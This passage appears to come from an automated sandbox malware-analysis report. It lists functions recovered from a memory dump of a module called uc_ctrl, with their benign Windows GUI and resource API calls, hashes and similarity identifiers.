Opcode Fuzzy Hash: 67b1bb62ef1b70e6a72e21af774cc9624dc3143c62fc949bf3d576381f4b81aa
Instruction Fuzzy Hash: 82012874604646AFDB089F69C888C6BFBB5FF46324324C129E86586E10EB31ED21CB90

Function 6CB3FE5B Relevance: 6.0, APIs: 4, Instructions: 40COMMON

Download Yara Rule

APIs

ScreenToClient.USER32(?,?), ref: 6CB3FE81
PtInRect.USER32(?,?,?), ref: 6CB3FE94
SetCapture.USER32(?), ref: 6CB3FEA1
RedrawWindow.USER32(?,00000000,00000000,00000401,00000000), ref: 6CB3FEC3

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: CaptureClientRectRedrawScreenWindow
String ID:
API String ID: 2178243973-0
Opcode ID: 36da79640e948ad08eb2a21a2fbeff964f638b23effd57efe1d682f7b3fc9fc9
Instruction ID: 09947ea1aa46366af2294af44576f1cb1e794f7c02b7e4717cfd2b09b189d6f1
Opcode Fuzzy Hash: 36da79640e948ad08eb2a21a2fbeff964f638b23effd57efe1d682f7b3fc9fc9
Instruction Fuzzy Hash: B7012872611218BFDB119FA4CC09FEEBBB8FB09310F00555AF94993690DB71A9549B60

Function 6CB346FD Relevance: 6.0, APIs: 4, Instructions: 38COMMON

Download Yara Rule

APIs

FindResourceW.KERNEL32(?,?,00000005), ref: 6CB34717
LoadResource.KERNEL32(?,00000000), ref: 6CB3471F
LockResource.KERNEL32(00000000), ref: 6CB3472C
FreeResource.KERNEL32(00000000,00000000,?,?), ref: 6CB34744

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Resource$FindFreeLoadLock
String ID:
API String ID: 1078018258-0
Opcode ID: 69f62fc573ae7964e6947e590f806108b4c028c299d73613eb72d5f99dbb2b98
Instruction ID: 3e78e6dac13d43d512b8624da7425752e7a69314744f7a5c27751c76f950a981
Opcode Fuzzy Hash: 69f62fc573ae7964e6947e590f806108b4c028c299d73613eb72d5f99dbb2b98
Instruction Fuzzy Hash: C2F0B436601114BB87015BA58C8CC9FFF7DEF5B6A1705505AFB0593200DA318D018BA0

Function 6CB34BA0 Relevance: 6.0, APIs: 4, Instructions: 36COMMON

Download Yara Rule

APIs

EnableWindow.USER32(00000000,00000001), ref: 6CB34BC4
GetActiveWindow.USER32 ref: 6CB34BCE
SetActiveWindow.USER32(00000000,?,?,?,?,?,00000000), ref: 6CB34BDA
FreeResource.KERNEL32(?,?,?,?,?,?,00000000), ref: 6CB34C03

Part of subcall function 6CB2D500: EnableWindow.USER32(?,00000000), ref: 6CB2D511

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Window$ActiveEnable$FreeResource
String ID:
API String ID: 253586258-0
Opcode ID: 9a68d3e77559e09259fce53ae0ff91860fd91b8b9e6bae022e745abff31f5c1d
Instruction ID: 7df748f61b61f88b6a5f8a4039e74eb5f0685065ce2aef77d0b82f846304908f
Opcode Fuzzy Hash: 9a68d3e77559e09259fce53ae0ff91860fd91b8b9e6bae022e745abff31f5c1d
Instruction Fuzzy Hash: D401AD34A02224EBCF019BA4C984BADBB71FF49318F142104E51573690DB79AC41CF91

Function 6CB2D8B2 Relevance: 6.0, APIs: 4, Instructions: 30windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 6CB2D8B8
GetParent.USER32(?), ref: 6CB2D8CB
GetParent.USER32(?), ref: 6CB2D8E5
SetFocus.USER32(?,00000000), ref: 6CB2D8FE

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Parent$Focus
String ID:
API String ID: 384096180-0
Opcode ID: c334ff08da38df63117d6716a9e2648355bd1d64984c77642d167843a05415f2
Instruction ID: 152a069d4a9c1caf595b1074ccc5d0e4eb3d4d4437b31494d3207553976923e9
Opcode Fuzzy Hash: c334ff08da38df63117d6716a9e2648355bd1d64984c77642d167843a05415f2
Instruction Fuzzy Hash: 6FF012736112809BCF112BB1DD0C86E7AB9FF4A3493400D25A5AA86E70DF3DD414D710

Function 6CB3C681 Relevance: 6.0, APIs: 4, Instructions: 27timeCOMMON

Download Yara Rule

APIs

ReleaseCapture.USER32 ref: 6CB3C694
InvalidateRect.USER32(?,00000000,00000001), ref: 6CB3C6BE
UpdateWindow.USER32(?), ref: 6CB3C6C7
KillTimer.USER32(?,0000EC0D), ref: 6CB3C6DD

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: CaptureInvalidateKillRectReleaseTimerUpdateWindow
String ID:
API String ID: 1483814783-0
Opcode ID: 7545891ab47313db910a97113e25ff1e3df5e3f4a1d55b537c964339ca74fbff
Instruction ID: 6b6c4b83e1402de491418247a8b99b0f213ac98b1dc17c0116d7389bc3455896
Opcode Fuzzy Hash: 7545891ab47313db910a97113e25ff1e3df5e3f4a1d55b537c964339ca74fbff
Instruction Fuzzy Hash: 73F01731601B60DBDB215F6AD808A87FEFAFF8A711F05591EF09A92620D7715040CF11

Function 6CC369A7 Relevance: 6.0, APIs: 4, Instructions: 25COMMON

Download Yara Rule

APIs

Part of subcall function 6CB2D9CF: ShowWindow.USER32(00000000,00000000,?,?,6CB1CA25,00000000,00000000,00000363,00000001,00000000,00000001,00000001,?,00000000,00000363,00000001), ref: 6CB2D9E0

UpdateWindow.USER32(?), ref: 6CC369CE
UpdateWindow.USER32(?), ref: 6CC369E1
SetRectEmpty.USER32(?), ref: 6CC369EE
SetRectEmpty.USER32(?), ref: 6CC369FB

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Window$EmptyRectUpdate$Show
String ID:
API String ID: 1262231214-0
Opcode ID: 8f8c267d2d59a1d5806009cc8cd18dbed088a7b0d2997a774a9cbb6ba4ee0d59
Instruction ID: d2e1e9fc8404a2b5ee6a91844c2529f3a27f32b235f9958df6e8962c185d23f1
Opcode Fuzzy Hash: 8f8c267d2d59a1d5806009cc8cd18dbed088a7b0d2997a774a9cbb6ba4ee0d59
Instruction Fuzzy Hash: 25F0F871212721CFDB119B74D808BD77BB8BF0A309F055459A49EC7690EB30E444CB50

Function 6CC5646D Relevance: 6.0, APIs: 4, Instructions: 14COMMON

Download Yara Rule

APIs

___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 6CC5646D
___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 6CC56472
___vcrt_initialize_locks.LIBVCRUNTIME ref: 6CC56477

Part of subcall function 6CC56B9B: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 6CC56BAC

___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 6CC5648C

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
String ID:
API String ID: 1761009282-0
Opcode ID: e3e196b70cd7c6cbccbe7df6e02ae4c7dcb589dc43b8c4ccb0c9ad7106e53efe
Instruction ID: 15dfc7bf52d6a84cc632f78fea6b2d3209071cdf1607b583cb3c1dfe28256266
Opcode Fuzzy Hash: e3e196b70cd7c6cbccbe7df6e02ae4c7dcb589dc43b8c4ccb0c9ad7106e53efe
Instruction Fuzzy Hash: ADC04C54884D01246E0166B152001DE43215E537CCBC415D0C951D7F01BF06103F61BE

Function 6CB232DD Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6CB232E4
CoCreateGuid.OLE32(?,?,?,?,?,?,?,?,?,?,?,?,00000028), ref: 6CB2333F

Strings

%08lX%04X%04x%02X%02X%02X%02X%02X%02X%02X%02X, xrefs: 6CB2338F

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: CreateGuidH_prolog3_
String ID: %08lX%04X%04x%02X%02X%02X%02X%02X%02X%02X%02X
API String ID: 2971167768-1017209998
Opcode ID: e2a5f41ad8542439437ba951801dcdf1a0d0bb7b3e03423ac8ecc533786b6f1b
Instruction ID: c1e3286561b6e82f5a95af935b4abe628bd41d74f89aa2e501628109d6818d80
Opcode Fuzzy Hash: e2a5f41ad8542439437ba951801dcdf1a0d0bb7b3e03423ac8ecc533786b6f1b
Instruction Fuzzy Hash: F1418271905199AFCF11DFA8C854AFEBBB9AF09318F040459E551B7781DB399E08CF60

Function 6CB4F4A8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000014), ref: 6CB4F516
CreateDIBitmap.GDI32(?,00000028,00000004,?,00000028,00000000), ref: 6CB4F566

Strings

(, xrefs: 6CB4F4FA

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: BitmapColorCreate
String ID: (
API String ID: 2048008349-3887548279
Opcode ID: 3d229e369ffa88cf228a7ac92bdcbc8064c0aff8a228880426b0be162992b8a5
Instruction ID: 800c887ed0f6508c84d7ee438c157cee4bb1b9b4a785311132dd7189d28aa7de
Opcode Fuzzy Hash: 3d229e369ffa88cf228a7ac92bdcbc8064c0aff8a228880426b0be162992b8a5
Instruction Fuzzy Hash: 5521C271A5124CDBEF04CFA88C45BEDBBF8EF15300F4080AEE545EB281DA349A08CB64

Function 6CB4B2B4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71windowCOMMON

Download Yara Rule

APIs

Part of subcall function 6CB4B0C0: IsWindow.USER32(?), ref: 6CB4B0CE

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 6CB4B2F6
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 6CB4B30C

Part of subcall function 6CB4E137: IsWindow.USER32(?), ref: 6CB4E143
Part of subcall function 6CB4E137: SendMessageW.USER32(?,0000113E,00000000,?), ref: 6CB4E16C

Strings

N, xrefs: 6CB4B2B7

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: MessageSend$Window
String ID: N
API String ID: 2326795674-1130791706
Opcode ID: 9655665dab4b5442fed0cb48f6dd9a1a247154cb7859e9a0c2030b22571a8a66
Instruction ID: f8c9490ea43ef03dc15def41cb796a0867740631c5972058987420dfa9b57673
Opcode Fuzzy Hash: 9655665dab4b5442fed0cb48f6dd9a1a247154cb7859e9a0c2030b22571a8a66
Instruction Fuzzy Hash: 42212731208A44EBDF008E56CC04BDF7B7AFF84729F04C129FB595AA94DB718811E791

Function 6CB8CB13 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6CB8CB1A
SetRectEmpty.USER32(?), ref: 6CB8CBC6

Strings

d, xrefs: 6CB8CC19

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: EmptyH_prolog3Rect
String ID: d
API String ID: 1443337074-2564639436
Opcode ID: c856d023fdf7bf4e5856b4dc8ebb896a6bce5722976cbee73df6e622df3fa083
Instruction ID: edb696d701c8e5ee66991bfeda4a72dd64b960c1653270cfd0583989ff29057c
Opcode Fuzzy Hash: c856d023fdf7bf4e5856b4dc8ebb896a6bce5722976cbee73df6e622df3fa083
Instruction Fuzzy Hash: 93318AB0911351CEDB80CF798585BD97AE4BB08314F1886BA8D5DDF64AEBB441488FB1

Function 6CB4A937 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6CB4A93E

Part of subcall function 6CB3A22E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000), ref: 6CB3A243

Part of subcall function 6CB846CA: __EH_prolog3.LIBCMT ref: 6CB846D1

Part of subcall function 6CB1A044: __EH_prolog3.LIBCMT ref: 6CB1A0F2

Part of subcall function 6CB84748: __EH_prolog3.LIBCMT ref: 6CB8474F

Strings

MFCShellListCtrl_EnableShellContextMenu, xrefs: 6CB4A98D
TRUE, xrefs: 6CB4A9AF

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: H_prolog3$ByteCharMultiWide
String ID: MFCShellListCtrl_EnableShellContextMenu$TRUE
API String ID: 2949695960-1509083621
Opcode ID: 7ea94144474453dddf8e7f63d0b2aa01dad1bd2ad7900d74982f7e0e65ab7a87
Instruction ID: 055b55a755fd8b2174efc394ca617b739ca7de2e6150d286a799fb6303ad3486
Opcode Fuzzy Hash: 7ea94144474453dddf8e7f63d0b2aa01dad1bd2ad7900d74982f7e0e65ab7a87
Instruction Fuzzy Hash: 2111FB7091129A9ADF14EBA4CC64FFEB778BF1030CF5048689025A7AD0EB759A0DDF51

Function 6CB4F9CB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

GetMonitorInfoW.USER32(?,?), ref: 6CB4F9EE
CopyRect.USER32(?,?), ref: 6CB4FA00

Strings

(, xrefs: 6CB4F9E7

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: CopyInfoMonitorRect
String ID: (
API String ID: 2119610155-3887548279
Opcode ID: b60599ceeb9f72958dc0c497ff212f01f8340d6ae802f956e7e0f2d9f00ec130
Instruction ID: b6a60ee6f5fd9b29f6cbe5147852aa77d19998f1dd134f3e2c3991acc89baae1
Opcode Fuzzy Hash: b60599ceeb9f72958dc0c497ff212f01f8340d6ae802f956e7e0f2d9f00ec130
Instruction Fuzzy Hash: 8011CE71A016099FDB00CFA9D9849AFBBF8EB09300B508899E856E3600E730FA45CF61

Function 6CB41B65 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyState.USER32(00000011), ref: 6CB41B7C

Part of subcall function 6CB42471: __EH_prolog3.LIBCMT ref: 6CB42478
Part of subcall function 6CB42471: SendMessageW.USER32(?,000000B0,?,?), ref: 6CB424BD
Part of subcall function 6CB42471: MessageBeep.USER32(000000FF), ref: 6CB42544

SendMessageW.USER32(?,000000B0,0000002E,?), ref: 6CB41BC0

Strings

., xrefs: 6CB41B98

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

